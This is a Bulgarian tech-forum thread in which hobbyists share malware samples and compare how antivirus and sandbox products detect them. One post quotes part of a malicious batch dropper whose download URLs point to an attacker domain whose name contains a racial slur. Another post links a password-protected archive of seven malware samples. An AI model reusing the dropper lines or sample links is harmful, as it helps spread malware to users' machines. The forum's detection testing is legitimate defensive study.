Премини към съдържанието
Форумът в приложение

По-лесно сърфиране. Научи повече.

Kaldata.com - Форуми

Приложение на форума на цял екран с push известия, значки и други.

За да инсталирате това приложение на iOS и iPadOS
  1. Докоснете Иконата за споделяне в Safari
  2. Превъртете менюто и докоснете Добавяне към началния екран.
  3. Докоснете Добавяне в горния десен ъгъл.
За да инсталирате това приложение на Android
  1. Докоснете менюто с 3 точки (⋮) в горния десен ъгъл на браузъра.
  2. Докоснете Добавяне към началния екран или Инсталиране на приложение.
  3. Потвърдете, като докоснете Инсталиране.

Добре дошли!

Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

 

Подпомагане на АВ програмите с дефиниции, откриване на нови заплахи - част 18

Featured Replies

преди 8 часа, attj написа:

https://www.virustotal.com/gui/file/11cf6b2d969923a9ec13bc0f5994de2d554461a33c732f42343f82b52f3e9d4d  Вече има и такива.  Антивирусите мълчат.   Някак стартира  поливариантно и лъже двата сандбокса.  Хипса на Комодо е предпоследен и блокира старта.    Последна е настроената стена.  За същата пак няма работа.      

Горкото ... 😉

image.png.6d7e2c7ecc2f090639c633e0c4f822cc.png

  • Отговори 8,9k
  • Прегледи 625,1k
  • Създадено
  • Последен отговор

Потребители с най-много отговори

Най-популярни публикации

  • Каква ползва от него тогава, като мълчи като риба? Само за красота и да товари системата ли?

  • При мен пък на тестовата машина с Windows XP SP3 и MS NetFreamwork 4 не иска да се стартира. Явно и вирусите спират поддръжката на XP 

  • Този е за пращане : http://dox.bg/files/dw?a=9f58b3c1f9 https://www.virustotal.com/bg/file/2ee50fd5c9f67e8814142de2009ec4234ee19dec1d4e9189ac5f45c359ed20eb/analysis/1482744276/    

Публикувани изображения

преди 4 часа, nikssi написа:

Горкото ... 😉

image.png.6d7e2c7ecc2f090639c633e0c4f822cc.png

Нещо подобно ми се извежда при старт в китайския пясъчник.     Остава да обясниш в лога на хипса на стената на Комодо защо е регистриран блокиран старт.    Стартира поливариантно, според мен.     

преди 5 часа, attj написа:

Нещо подобно ми се извежда при старт в китайския пясъчник.     Остава да обясниш в лога на хипса на стената на Комодо защо е регистриран блокиран старт.    Стартира поливариантно, според мен.     

Тоше , колко пъти да обяснявам,че хипса е настроен така: Всичко непознато в KSN като доверено приложение  е забранено? 

image.png.cc9c96edc5b5f5f573f26991b5852c6b.png

image.png.a09126eb0375e1b82d8c6a67821384f9.png

преди 6 часа, attj написа:

Остава да обясниш в лога на хипса на стената на Комодо защо е регистриран блокиран старт. 

Комодо не ползвам в момента. Ти си рови из логовете. Аз проблеми със защитата нямам. Настрои го този Комодо бре Тоше - това което е при мене може да стане и с Комодо с два три клика.

Той и хипсът на Комодо блокира всякакъв неразрешен старт.   А според сандбокса на Кихчо въобще няма стартиране!?    Уж няма - ама има.      6 програми вече класифицират вредоносен код.   

преди 7 минути, attj написа:

Той и хипсът на Комодо блокира всякакъв неразрешен старт.   А според сандбокса на Кихчо въобще няма стартиране!?    Уж няма - ама има.      6 програми вече класифицират вредоносен код.   

Comodo също можеш да я настроиш на automatic да блокира всички И ДА НЕ ПОКАЗВА СЪОБЩЕНИЯ като те дразнят. Така няма да извежда нищо и за да разбереш какво е станало трябва да гледаш следните 3 неща:

1. Логовете.

2. Секцията Отблокирване на програми.

3. Карантината.

преди 3 минути, B-boy/StyLe/ написа:

Comodo също можеш да я настроиш на automatic да блокира всички И ДА НЕ ПОКАЗВА СЪОБЩЕНИЯ като те дразнят. Така няма да извежда нищо и за да разбереш какво е станало трябва да гледаш следните 3 неща:

1. Логовете.

2. Секцията Отблокирване на програми.

3. Карантината.

Точно така съм направил.   

Нямам идея.  На служебния е  CrowdStrike Falcon® и въобще не намирам подобен адрес.   Може да е филтрирано превантивно.

току-що, attj написа:

На служебния е  CrowdStrike Falcon® и въобще не намирам подобен адрес.   Може да е филтрирано превантивно.

То що не работиш бре! Жа та изплющЯ. 😁

Отново мълчание тук    https://www.virustotal.com/gui/file/cb73d3b4806e13127f1845d4feb320b566bb8144ab3cce36f8482bb942df35c2     И пак е същото.     Уж няма старт в китайския сандбокс, а е с блокиран старт от хипса на Варанчо.   Някой друг ще се осмели ли да стартира?   

преди 3 минути, attj написа:

Отново мълчание тук    https://www.virustotal.com/gui/file/cb73d3b4806e13127f1845d4feb320b566bb8144ab3cce36f8482bb942df35c2     И пак е същото.     Уж няма старт в китайския сандбокс, а е с блокиран старт от хипса на Варанчо.   Някой друг ще се осмели ли да стартира?   

При мен този "BAT" дропва два други,които също се стартират...Без детекция на G Data...

току-що, Лудият Учен написа:

При мен този "BAT" дропва два други,които също се стартират...Без детекция на G Data...

Много груба грешка е да се изтърве стартирането.  После е късно.   

Стената на Варанчо също може да блокира връзки и да възпрепятства тези активирани буби.   Обаче повечето вендори въобще не разполагат със стени с подобни възможности.   И не е случайно -доста хора я предпочитат стената на Комодо  със защитника на Микрософт.     Аз предпочитам 360 TS  - заради стартирането в китайския пясъчник . Това подвежда бубите и ги лъже за средата.  Има и автосандбокс.   Някои казват,  че бубите дори са като предварително зашеметени.  Весело да става.     Дънят се при многомодулно подсигуряване и това не е изненада.

преди 1 час, attj написа:

Отново мълчание тук    https://www.virustotal.com/gui/file/cb73d3b4806e13127f1845d4feb320b566bb8144ab3cce36f8482bb942df35c2     И пак е същото.     Уж няма старт в китайския сандбокс, а е с блокиран старт от хипса на Варанчо.   Някой друг ще се осмели ли да стартира?   

image.png.c43263af3e3ab537f973997da2352578.png

При мене пак запецна горкото , явно мецана го е настъпила нещо или е седнала отгоре му ... 

преди 1 час, Лудият Учен написа:

При мен този "BAT" дропва два други,които също се стартират...Без детекция на G Data...

image.png.cfd8c3d1400e7d5aea5b9945b029e18c.png

image.png.3f590a2e1944c137297086ea0c46e0a5.png

Другия

image.png.346812c0646ec91c97464308c896557c.png

image.png.2932d9a2d394c47ec857777e20b4a406.png

Връзките на помощниците ги блокира Касперски

Spoiler

:: List of URLs to download
set url1=hxxps://dirtyniggers.forsale/MLDROP.bat
set url2=hxxps://dirtyniggers.forsale/droplnk.bat

 

преди 1 час, attj написа:

Стената на Варанчо също може да блокира връзки и да възпрепятства тези активирани буби.   Обаче повечето вендори въобще не разполагат със стени с подобни възможности.   И не е случайно -доста хора я предпочитат стената на Комодо  със защитника на Микрософт.     Аз предпочитам 360 TS  - заради стартирането в китайския пясъчник . Това подвежда бубите и ги лъже за средата.  Има и автосандбокс.   Някои казват,  че бубите дори са като предварително зашеметени.  Весело да става.     Дънят се при многомодулно подсигуряване и това не е изненада.

Тоше,виж...И друг път сме я дъвкали тази дъвка...Ти знаеш,че файловете,които споделям са зловредни на 100% Но ако си свалиш някакъв файл от интернет и стената го спре като подозрителен без да имаш точна дефиниция...Тогава какво трябва да се направи ? Малко или повече ще има фалшиви сигнали...Ако си предпазлив , ще си спасиш компютъра,но няма да можеш да си инсталираш програмата,играта или каквото да е...Ако не си предпазлив,рискуваш да си заразиш компютъра...Нужни са ти точни дефиниции...Особено ако компютърът ти е вече заразен и има ценни и важни файлове и данни...Тогава няма как да преинсталираш и имаш нужда не само от програма със силни дефиниции,но и от добро почистване от антивирус...

П.П. Аз не съм експерт,но ми се струва резонно това,което съм написал...

преди 8 часа, Лудият Учен написа:

Ти знаеш,че файловете,които споделям са зловредни на 100% 

Винаги се съмнявам и в това.  Грешки се случват.    Можеш да нулираш  Уина и  при запазване на своите папки и файлове.  Форматирането невинаги е задължително.

https://www.upload.ee/files/16999429/Malware.rar.html

7 зловредни файла...Password infected

преди 23 минути, attj написа:

Нещо от мен -  има ли заплаха тук   https://www.comss.ru/page.php?id=5230          Ето и   https://www.virustotal.com/gui/file/cc770cb2a7fa0a35c3cb624f7496e72f4416ff34ab6b1c2bd122cc961d3d6ad5

G Data Total Security с детекция...Мерси,Тоше !!!

Screenshot_1.png

 

 

G Data Total Security този път отстреля всичко  7/7...

Screenshot_3.png

Screenshot_1.png

Screenshot_2.png

Wise Care 365 PRO с години ми е предпочитана спомагателна китайска програма и там няма никакви реални заплахи.

преди 51 минути, attj написа:

Нещо от мен -  има ли заплаха тук   https://www.comss.ru/page.php?id=5230          Ето и   https://www.virustotal.com/gui/file/cc770cb2a7fa0a35c3cb624f7496e72f4416ff34ab6b1c2bd122cc961d3d6ad5

image.png.91110be259a2d1f473090c24113b55c2.png

image.png.53299d31d001681ac43f999482b79107.png

Някой още от рано е почнал с ракиЯта 😉 

КасперскиЛабс няма да дадат фалшива тревога.      Другите ""красавци и хубавци""  отдавна са ми известни.   Наблюдавам ги с години -специално за това приложение.  ЕСЕТ са най-твърдоглави и си знаят тяхното.

току-що, attj написа:

КасперскиЛабс няма да дадат фалшива тревога.      Другите ""красавци и хубавци""  отдавна са ми известни.   Наблюдавам ги с години -специално за това приложение.  ЕСЕТ са най-твърдоглави и си знаят тяхното.

Това ,че програмата е в Доверени не означава,че вътре няма разни подканящи те модули за инсталиране или промяна на нещо. Доколкото видях и репорта на Вирус Тотал си е жив рекламен софтуер и за това подскачат.

току-що, nikssi написа:

 рекламен софтуер 

Няма такова нещо.  Това приложение е оптимизиращо-почистващо и няма никакви реклами.

Регистрирайте се или влезете в профила си за да коментирате

Разглеждащи това в момента 0

  • Няма регистрирани потребители разглеждащи тази страница.

Дарение

  • Подкрепи съществуването на форума - направи дарение
    32%
    Дарени 315 € от нужните 1 000 €

Бюлетин

Получавайте известие, когато има важна промяна или новина свързана с форума.

Профил

Навигация

Търсене

Търсене

Конфигуриране на push известия в браузъра

Chrome (Android)
  1. Докоснете иконата на катинар до адресната лента.
  2. Докоснете Разрешения → Известия.
  3. Променете предпочитанията си.
Chrome (Desktop)
  1. Кликнете върху иконата на катинар в адресната лента.
  2. Изберете Настройки на сайта.
  3. Намерете Известия и коригирайте предпочитанията си.